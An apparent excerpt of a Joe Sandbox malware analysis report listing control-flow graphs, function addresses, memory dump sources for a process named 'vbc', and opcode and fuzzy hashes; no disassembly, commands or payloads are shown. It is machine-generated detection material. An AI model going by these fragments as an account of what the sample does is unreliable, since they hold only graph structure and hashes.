                                                                                                                                              control_flow_graph 3685 53f3e09-53f3e25 3686 53f3e2e-53f3e3e 3685->3686 3687 53f3e27-53f3e29 3685->3687 3689 53f3e45-53f3e55 3686->3689 3690 53f3e40 3686->3690 3688 53f40cc-53f40d3 3687->3688 3692 53f3e5b-53f3e69 3689->3692 3693 53f40b3-53f40c1 3689->3693 3690->3688 3696 53f3e6f 3692->3696 3697 53f40d4-53f4153 3692->3697 3693->3697 3698 53f40c3-53f40c7 call 53f02c8 3693->3698 3696->3697 3699 53f3f9f-53f3fc7 3696->3699 3700 53f3eda-53f3efb 3696->3700 3701 53f4039-53f4065 3696->3701 3702 53f3e76-53f3e88 3696->3702 3703 53f3eb3-53f3ed5 3696->3703 3704 53f3f72-53f3f9a 3696->3704 3705 53f400e-53f4034 3696->3705 3706 53f3e8d-53f3eae 3696->3706 3707 53f3f4c-53f3f6d 3696->3707 3708 53f3fcc-53f4009 3696->3708 3709 53f4067-53f4082 call 53f02d8 3696->3709 3710 53f40a7-53f40b1 3696->3710 3711 53f3f26-53f3f47 3696->3711 3712 53f4084-53f40a5 call 53f28f0 3696->3712 3713 53f3f00-53f3f21 3696->3713 3698->3688 3699->3688 3700->3688 3701->3688 3702->3688 3703->3688 3704->3688 3705->3688 3706->3688 3707->3688 3708->3688 3709->3688 3710->3688 3711->3688 3712->3688 3713->3688
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 88af968fdde1242cf47e027548cc410c8735e9948c2da60db05409390ad40fa0
                                                                                                                                              • Instruction ID: a07281eaacba17f76366616eecdefac50a54d0b8155002f02c7ffd986b5d2ecd
                                                                                                                                              • Opcode Fuzzy Hash: 88af968fdde1242cf47e027548cc410c8735e9948c2da60db05409390ad40fa0
                                                                                                                                              • Instruction Fuzzy Hash: 89917174B04219DBEB4CEBB5985527FBBABAFC8700B05855DE607EB284CE3598018791
                                                                                                                                              Function 053FC147 Relevance: .2, Instructions: 230COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3987 53fc147-53fc158 3988 53fc15a-53fc172 3987->3988 3989 53fc184 3987->3989 3993 53fc17b-53fc17e 3988->3993 3994 53fc174-53fc179 3988->3994 3990 53fc186-53fc18a 3989->3990 3995 53fc18b-53fc199 3993->3995 3996 53fc180-53fc182 3993->3996 3994->3990 3998 53fc19b-53fc1a1 3995->3998 3999 53fc1c5-53fc1c8 3995->3999 3996->3988 3996->3989 4000 53fc1cd-53fc1ce 3998->4000 4001 53fc1a3-53fc1c1 3998->4001 4002 53fc1cf-53fc2ac call 53f41a0 call 53f3cc0 3999->4002 4003 53fc1ca-53fc1cb 3999->4003 4000->4002 4001->3999 4014 53fc2ae 4002->4014 4015 53fc2b3-53fc2d4 call 53f5658 4002->4015 4003->4000 4014->4015 4017 53fc2d9-53fc2e4 4015->4017 4018 53fc2eb-53fc2ef 4017->4018 4019 53fc2e6 4017->4019 4020 53fc2f4-53fc2fb 4018->4020 4021 53fc2f1-53fc2f2 4018->4021 4019->4018 4023 53fc2fd 4020->4023 4024 53fc302-53fc310 4020->4024 4022 53fc313-53fc357 4021->4022 4028 53fc3bd-53fc3d4 4022->4028 4023->4024 4024->4022 4030 53fc359-53fc36f 4028->4030 4031 53fc3d6-53fc3fb 4028->4031 4035 53fc399 4030->4035 4036 53fc371-53fc37d 4030->4036 4040 53fc3fd-53fc412 4031->4040 4041 53fc413 4031->4041 4039 53fc39f-53fc3bc 4035->4039 4037 53fc37f-53fc385 4036->4037 4038 53fc387-53fc38d 4036->4038 4042 53fc397 4037->4042 4038->4042 4039->4028 4040->4041 4042->4039
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a129a1625f7be67327b0dbeb9ce07c2ef01a1c95eecd9d21eaf5e9df4fb8086f
                                                                                                                                              • Instruction ID: 979d11b2ad96cffca8461e89fff2ba05c07d52d92fe97bd8e0b8354c3b53b6ce
                                                                                                                                              • Opcode Fuzzy Hash: a129a1625f7be67327b0dbeb9ce07c2ef01a1c95eecd9d21eaf5e9df4fb8086f
                                                                                                                                              • Instruction Fuzzy Hash: 7AA1E575E0421C9FDB14DFA9D884AADBBF6BF89300F14906AE509AB361DB349C41CF50
                                                                                                                                              Function 053F5362 Relevance: .2, Instructions: 195COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 69f55cbe1a609a48b941f50360743f9c48dbd558f4169d234efc984456d9298f
                                                                                                                                              • Instruction ID: 21c1b2a2f942bb66f3e383ff2a1212b16c2e372f84bf6665980794497e75f182
                                                                                                                                              • Opcode Fuzzy Hash: 69f55cbe1a609a48b941f50360743f9c48dbd558f4169d234efc984456d9298f
                                                                                                                                              • Instruction Fuzzy Hash: DD91C574E00258CFEB18DFA9D984A9DBBF2FF89300F14806AD919AB361DB749945CF50
                                                                                                                                              Function 053FC468 Relevance: .2, Instructions: 188COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b4c19e2ec481e07d6311893d7d2ce8689241e7259bd254f7bec2d456047608f7
                                                                                                                                              • Instruction ID: fdcca9d01a4814adf5ae72d60cb5612239886f77edad0d5167443ec3cb6931ed
                                                                                                                                              • Opcode Fuzzy Hash: b4c19e2ec481e07d6311893d7d2ce8689241e7259bd254f7bec2d456047608f7
                                                                                                                                              • Instruction Fuzzy Hash: 2F81A174E0421CCFEB18DFAAD984A9DBBF2BF88300F149069E519AB351DB749941CF50
                                                                                                                                              Function 053FD278 Relevance: .2, Instructions: 184COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 06b9a38eb5b7c0a39cf2e336dc61c9b9ad998f4e7aa6c84b4332ad3037b59ad0
                                                                                                                                              • Instruction ID: 81afdc44de10f899e464155066c5e9292b0cf8066df74326713c1ca0ba1447dc
                                                                                                                                              • Opcode Fuzzy Hash: 06b9a38eb5b7c0a39cf2e336dc61c9b9ad998f4e7aa6c84b4332ad3037b59ad0
                                                                                                                                              • Instruction Fuzzy Hash: 58819574E00218CFEB14DFA9D988A9DBBF2FF88300F148469D519AB365DB749945CF50
                                                                                                                                              Function 053FCA08 Relevance: .2, Instructions: 184COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1426289dc4d359c68ac465d194e89829b86a785b6147b6a911ec54e7b80b8bcb
                                                                                                                                              • Instruction ID: ef4b223721bd108ee038d77989e36d0426c67266d308bae53f8966b1d3d320f6
                                                                                                                                              • Opcode Fuzzy Hash: 1426289dc4d359c68ac465d194e89829b86a785b6147b6a911ec54e7b80b8bcb
                                                                                                                                              • Instruction Fuzzy Hash: 5681A274E0421C8FEB18DFAAD944A9DBBF2BF88300F149069D519AB365DB709D41CF50
                                                                                                                                              Function 053FC738 Relevance: .2, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 46e616e3926cfc4e4c34dedd976c7965ba5ff7a6a4b44d930a668f5ae15e3793
                                                                                                                                              • Instruction ID: 9b8cb8b6d49658982fabff9ce801583419d729e5aa784ff98b8a36aac81009c3
                                                                                                                                              • Opcode Fuzzy Hash: 46e616e3926cfc4e4c34dedd976c7965ba5ff7a6a4b44d930a668f5ae15e3793
                                                                                                                                              • Instruction Fuzzy Hash: 8E81B374E0421CCFEB18DFAAD984A9DBBF2BF88300F14906AE519AB355DB749941CF50
                                                                                                                                              Function 053FCCD8 Relevance: .2, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 49cd3fedddf4fba97622e03081a72b5396605be2d6b5087cb54bcd9348a9335c
                                                                                                                                              • Instruction ID: a0a015f9e16c1e492eac49cc05a98ebed5ebefdb0d13ce640413dc5ed2cc1010
                                                                                                                                              • Opcode Fuzzy Hash: 49cd3fedddf4fba97622e03081a72b5396605be2d6b5087cb54bcd9348a9335c
                                                                                                                                              • Instruction Fuzzy Hash: 9381C274E4421CCFEB18DFAAD984A9DBBF2BF88301F149069E509AB361DB309941CF50
                                                                                                                                              Function 053FCFAA Relevance: .2, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1877d2b8f17fd47891d6a160c6511850e9f6b45701d799401c057771f29b9304
                                                                                                                                              • Instruction ID: 7e8de1f83eeccdffd3b94216d69384e1f4704a4049afd4ef3dff6e5930b2b90f
                                                                                                                                              • Opcode Fuzzy Hash: 1877d2b8f17fd47891d6a160c6511850e9f6b45701d799401c057771f29b9304
                                                                                                                                              • Instruction Fuzzy Hash: 8C81B574E00218CFEB58DFA9D988A9DBBF2FF88300F148469E509AB361DB749945CF50
                                                                                                                                              Function 053FE97A Relevance: .1, Instructions: 147COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e62b8d86cc98ca96bf2ad5edce20148e50cd256c7622e2284892ec7947fb24b8
                                                                                                                                              • Instruction ID: ea071066e6791f2b46a97325fe503b84ba4997467a255456d7a49eb24e4d00ab
                                                                                                                                              • Opcode Fuzzy Hash: e62b8d86cc98ca96bf2ad5edce20148e50cd256c7622e2284892ec7947fb24b8
                                                                                                                                              • Instruction Fuzzy Hash: 6851A574E00218DFEB18DFA9D854A9DFBB6FF89300F24802AE915AB365DB305941DF54
                                                                                                                                              Function 053FE988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c290c76852852d529549490a21b5a9180fa770a8ed26b2edb7cdc9bbc9ab937e
                                                                                                                                              • Instruction ID: fed723fdb865d2e6221cc435fd4b4eb47d71839cffee9620a4c3f4ff6ce070dd
                                                                                                                                              • Opcode Fuzzy Hash: c290c76852852d529549490a21b5a9180fa770a8ed26b2edb7cdc9bbc9ab937e
                                                                                                                                              • Instruction Fuzzy Hash: FA519474E00318DFEB18DFAAD894A9DBBB6FF89300F248129E815AB365DB305941DF54
                                                                                                                                              Function 09DB992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1049 9db992c 1050 9db99eb-9db99fc 1049->1050 1051 9db99fe 1050->1051 1052 9db9a03-9db9a0c 1050->1052 1051->1052 1054 9db97e3-9db9808 1052->1054 1055 9db9a12-9db9a25 1052->1055 1058 9db980a 1054->1058 1059 9db980f-9db9846 1054->1059 1056 9db9a2c-9db9a47 1055->1056 1057 9db9a27 1055->1057 1060 9db9a49 1056->1060 1061 9db9a4e-9db9a62 1056->1061 1057->1056 1058->1059 1068 9db9848 1059->1068 1069 9db984d-9db987f 1059->1069 1060->1061 1064 9db9a69-9db9a7f LdrInitializeThunk 1061->1064 1065 9db9a64 1061->1065 1067 9db9a81-9db9b7e 1064->1067 1065->1064 1072 9db9b80-9db9b85 1067->1072 1073 9db9b86-9db9b90 1067->1073 1068->1069 1074 9db98e3-9db98f6 1069->1074 1075 9db9881-9db98a6 1069->1075 1072->1073 1079 9db98f8 1074->1079 1080 9db98fd-9db9922 1074->1080 1077 9db98a8 1075->1077 1078 9db98ad-9db98db 1075->1078 1077->1078 1078->1074 1079->1080 1083 9db9931-9db9969 1080->1083 1084 9db9924-9db9925 1080->1084 1085 9db996b 1083->1085 1086 9db9970-9db99d1 call 9db9328 1083->1086 1084->1055 1085->1086 1092 9db99d8-9db99ea 1086->1092 1093 9db99d3 1086->1093 1092->1050 1093->1092
                                                                                                                                              APIs
                                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 09DB9A6E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4070627740.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_9db0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 7262e541824d808a3e5c307b2d8d07a3a9eb71a0a81c66c337870a99fec34654
                                                                                                                                              • Instruction ID: 08f676735a6dbdd4db7c15403132049e23884c4020d4dd0f53955b549d0c5dff
                                                                                                                                              • Opcode Fuzzy Hash: 7262e541824d808a3e5c307b2d8d07a3a9eb71a0a81c66c337870a99fec34654
                                                                                                                                              • Instruction Fuzzy Hash: EA114778E40249CBDB04DFA8D494AEDB7F5FB88308F148165E949EB745D630D941CB60
                                                                                                                                              Function 053FE007 Relevance: .7, Instructions: 655COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1865 53fe007-53fe028 1866 53fe029-53fe02a call 53fe8e8 1865->1866 1867 53fe030-53fe099 1866->1867 1883 53fe0a0-53fe0d1 call 53ff71f 1867->1883 1891 53fe0d8 1883->1891 1892 53fe0df 1891->1892 2190 53fe0e0 call 9dbddf1 1892->2190 2191 53fe0e0 call 9dbde00 1892->2191 1893 53fe0e6-53fe0ed 1895 53fe0f4-53fe0fb 1893->1895 1897 53fe102-53fe110 1895->1897 1900 53fe117-53fe11e 1897->1900 1902 53fe125 1900->1902 1903 53fe12c 1902->1903 1904 53fe133 1903->1904 1905 53fe13a 1904->1905 1906 53fe141 1905->1906 1907 53fe148 1906->1907 1908 53fe14f-53fe156 1907->1908 1910 53fe15d-53fe164 1908->1910 1912 53fe16b 1910->1912 1913 53fe172-53fe179 1912->1913 1915 53fe180 1913->1915 1916 53fe187 1915->1916 1917 53fe18e 1916->1917 1918 53fe195-53fe19c 1917->1918 1920 53fe1a3-53fe1b1 1918->1920 1923 53fe1b8 1920->1923 1924 53fe1bf-53fe1c6 1923->1924 1926 53fe1cd-53fe1d4 1924->1926 1928 53fe1db-53fe1e2 1926->1928 1930 53fe1e9 1928->1930 1931 53fe1f0 1930->1931 1932 53fe1f7 1931->1932 1933 53fe1fe 1932->1933 1934 53fe205 1933->1934 1935 53fe20c-53fe213 1934->1935 1937 53fe21a 1935->1937 1938 53fe221-53fe22f 1937->1938 1941 53fe236-53fe23d 1938->1941 1943 53fe244 1941->1943 1944 53fe24b-53fe252 1943->1944 1946 53fe259 1944->1946 1947 53fe260 1946->1947 1948 53fe267-53fe275 1947->1948 1951 53fe27c-53fe283 1948->1951 1953 53fe28a 1951->1953 1954 53fe291 1953->1954 1955 53fe298-53fe29f 1954->1955 1957 53fe2a6-53fe2ad 1955->1957 1959 53fe2b4-53fe2bb 1957->1959 1961 53fe2c2-53fe2c9 1959->1961 1963 53fe2d0-53fe2d7 1961->1963 1965 53fe2de-53fe2f3 1963->1965 1969 53fe2fa-53fe301 1965->1969 1971 53fe308 1969->1971 1972 53fe30f-53fe316 1971->1972 1974 53fe31d-53fe324 1972->1974 1976 53fe32b-53fe332 1974->1976 1978 53fe339 1976->1978 1979 53fe340 1978->1979 1980 53fe347-53fe34e 1979->1980 1982 53fe355-53fe35c 1980->1982 1984 53fe363-53fe36a 1982->1984 1986 53fe371-53fe378 1984->1986 1988 53fe37f-53fe386 1986->1988 1990 53fe38d 1988->1990 1991 53fe394 1990->1991 1992 53fe39b-53fe3a2 1991->1992 1994 53fe3a9-53fe3b7 1992->1994 1997 53fe3be 1994->1997 1998 53fe3c5-53fe3cc 1997->1998 2000 53fe3d3 1998->2000 2001 53fe3da 2000->2001 2002 53fe3e1 2001->2002 2003 53fe3e8-53fe3f6 2002->2003 2006 53fe3fd-53fe412 2003->2006 2010 53fe419-53fe420 2006->2010 2012 53fe427-53fe4f9 2010->2012 2043 53fe500-53fe507 2012->2043 2045 53fe50e-53fe515 2043->2045 2047 53fe51c 2045->2047 2048 53fe523-53fe538 2047->2048 2052 53fe53f-53fe546 2048->2052 2054 53fe54d-53fe60a 2052->2054 2082 53fe611-53fe618 2054->2082 2186 53fe619 call 9dbfc5b 2082->2186 2187 53fe619 call 9dbfc68 2082->2187 2084 53fe61f 2085 53fe626 2084->2085 2086 53fe62d-53fe63b 2085->2086 2089 53fe642 2086->2089 2090 53fe649-53fe6d5 2089->2090 2111 53fe6dc 2090->2111 2112 53fe6e3-53fe71b 2111->2112 2121 53fe722-53fe729 2112->2121 2123 53fe730-53fe73e 2121->2123 2126 53fe745 2123->2126 2127 53fe74c-53fe82c 2126->2127 2160 53fe833 2127->2160 2161 53fe83a-53fe848 2160->2161 2164 53fe84f 2161->2164 2165 53fe856 2164->2165 2166 53fe85d-53fe86b 2165->2166 2169 53fe872-53fe879 2166->2169 2171 53fe880-53fe8aa 2169->2171 2178 53fe8b1-53fe8cd 2171->2178 2183 53fe8d4-53fe8db 2178->2183 2185 53fe8e2-53fe8e5 2183->2185 2186->2084 2187->2084 2190->1893 2191->1893
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 202c2340a9aab4e278e1cb0b5661677c948f4b4b7d449454fe82af8345a07429
                                                                                                                                              • Instruction ID: 0dc2e365af33d988294c0f0930c8911eba46344e9fbf9f69cd5e51256e807c26
                                                                                                                                              • Opcode Fuzzy Hash: 202c2340a9aab4e278e1cb0b5661677c948f4b4b7d449454fe82af8345a07429
                                                                                                                                              • Instruction Fuzzy Hash: B612AA348322929FE2802B30F6AE12E7B65FB5F723B46AD05F01FC4455DB7A15588B22
                                                                                                                                              Function 053FE018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2192 53fe018-53fe022 2193 53fe029-53fe0df call 53fe8e8 call 53ff71f 2192->2193 2194 53fe024 2192->2194 2518 53fe0e0 call 9dbddf1 2193->2518 2519 53fe0e0 call 9dbde00 2193->2519 2194->2193 2221 53fe0e6-53fe618 2514 53fe619 call 9dbfc5b 2221->2514 2515 53fe619 call 9dbfc68 2221->2515 2412 53fe61f-53fe8db 2513 53fe8e2-53fe8e5 2412->2513 2514->2412 2515->2412 2518->2221 2519->2221
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f8909d178dd2ea1581ad7e670ead0a2f7d5516e46872afcd03157eca47d0e4de
                                                                                                                                              • Instruction ID: 25d8b54bc057ae07c3d4cb75132fb5851a988c786870ba7a7d5098574130814f
                                                                                                                                              • Opcode Fuzzy Hash: f8909d178dd2ea1581ad7e670ead0a2f7d5516e46872afcd03157eca47d0e4de
                                                                                                                                              • Instruction Fuzzy Hash: F91298748322939FE6803B30F6AE12E7B65FB5F723B46AD05F01FC44559B7A14588B22
                                                                                                                                              Function 053F0C8F Relevance: .5, Instructions: 546COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2520 53f0c8f-53f0cc0 2522 53f0cc7-53f0cdd call 53f0780 2520->2522 2523 53f0cc2 2520->2523 2526 53f0ce2 2522->2526 2523->2522 2527 53f0cee-53f104e call 53f0780 * 13 2526->2527 2601 53f1056-53f105f 2527->2601 2717 53f1062 call 53f2790 2601->2717 2718 53f1062 call 53f27f0 2601->2718 2602 53f1068-53f107d 2721 53f1080 call 53f3cb1 2602->2721 2722 53f1080 call 53f3cc0 2602->2722 2604 53f1086-53f108f 2723 53f1092 call 53f4285 2604->2723 2724 53f1092 call 53f41a0 2604->2724 2605 53f1098-53f10c2 2608 53f10cb-53f10ce call 53f5362 2605->2608 2609 53f10d4-53f10fe 2608->2609 2612 53f1107-53f110a call 53fc147 2609->2612 2613 53f1110-53f113a 2612->2613 2616 53f1143-53f1146 call 53fc468 2613->2616 2617 53f114c-53f1176 2616->2617 2620 53f117f-53f1182 call 53fc738 2617->2620 2621 53f1188-53f11b2 2620->2621 2624 53f11bb-53f11be call 53fca08 2621->2624 2625 53f11c4-53f11f7 2624->2625 2628 53f1203-53f1209 call 53fccd8 2625->2628 2629 53f120f-53f124b 2628->2629 2632 53f1257-53f125d call 53fcfaa 2629->2632 2633 53f1263-53f129f 2632->2633 2636 53f12ab-53f12b1 call 53fd278 2633->2636 2637 53f12b7-53f13d2 2636->2637 2650 53f13de-53f13f0 call 53f5362 2637->2650 2651 53f13f6-53f145c 2650->2651 2656 53f1467-53f1473 call 53fd548 2651->2656 2657 53f1479-53f1485 2656->2657 2658 53f1490-53f149c call 53fd548 2657->2658 2659 53f14a2-53f14ae 2658->2659 2660 53f14b9-53f14c5 call 53fd548 2659->2660 2661 53f14cb-53f14d7 2660->2661 2662 53f14e2-53f14ee call 53fd548 2661->2662 2663 53f14f4-53f1500 2662->2663 2664 53f150b-53f1517 call 53fd548 2663->2664 2665 53f151d-53f1529 2664->2665 2666 53f1534-53f153a 2665->2666 2719 53f1540 call 53fd548 2666->2719 2720 53f1540 call 53fd6d4 2666->2720 2667 53f1546-53f1552 2668 53f155d-53f1569 call 53fd548 2667->2668 2669 53f156f-53f158c 2668->2669 2671 53f1597-53f15a3 call 53fd548 2669->2671 2672 53f15a9-53f15b5 2671->2672 2673 53f15c0-53f15cc call 53fd548 2672->2673 2674 53f15d2-53f15de 2673->2674 2675 53f15e9-53f15f5 call 53fd548 2674->2675 2676 53f15fb-53f1607 2675->2676 2677 53f1612-53f161e call 53fd548 2676->2677 2678 53f1624-53f1630 2677->2678 2679 53f163b-53f1647 call 53fd548 2678->2679 2680 53f164d-53f1659 2679->2680 2681 53f1664-53f1670 call 53fd548 2680->2681 2682 53f1676-53f1682 2681->2682 2683 53f168d-53f1699 call 53fd548 2682->2683 2684 53f169f-53f16ab 2683->2684 2685 53f16b6-53f16c2 call 53fd548 2684->2685 2686 53f16c8-53f16d4 2685->2686 2687 53f16df-53f16eb call 53fd548 2686->2687 2688 53f16f1-53f17aa 2687->2688 2717->2602 2718->2602 2719->2667 2720->2667 2721->2604 2722->2604 2723->2605 2724->2605
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2fcaf15d297574dfb01fd5cc31b2e8924c4a59fe7724c7d05769d14d360482a9
                                                                                                                                              • Instruction ID: f6daab55af12f75c1c7244fa3ed7aa9f36f9ba659696490d77edaded126a9213
                                                                                                                                              • Opcode Fuzzy Hash: 2fcaf15d297574dfb01fd5cc31b2e8924c4a59fe7724c7d05769d14d360482a9
                                                                                                                                              • Instruction Fuzzy Hash: 0852FD74A02219CFDF64DF68E989B9DBBB6FB88301F104199D40AA7755DB34AD81CF80
                                                                                                                                              Function 053F0CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2730 53f0ca0-53f0cc0 2731 53f0cc7-53f105f call 53f0780 * 14 2730->2731 2732 53f0cc2 2730->2732 2913 53f1062 call 53f2790 2731->2913 2914 53f1062 call 53f27f0 2731->2914 2732->2731 2811 53f1068-53f107d 2917 53f1080 call 53f3cb1 2811->2917 2918 53f1080 call 53f3cc0 2811->2918 2813 53f1086-53f108f 2919 53f1092 call 53f4285 2813->2919 2920 53f1092 call 53f41a0 2813->2920 2814 53f1098-53f153a call 53f5362 call 53fc147 call 53fc468 call 53fc738 call 53fca08 call 53fccd8 call 53fcfaa call 53fd278 call 53f5362 call 53fd548 * 5 2915 53f1540 call 53fd548 2814->2915 2916 53f1540 call 53fd6d4 2814->2916 2876 53f1546-53f16eb call 53fd548 * 10 2897 53f16f1-53f17aa 2876->2897 2913->2811 2914->2811 2915->2876 2916->2876 2917->2813 2918->2813 2919->2814 2920->2814
                                                                                                                                              Memory Dump Source
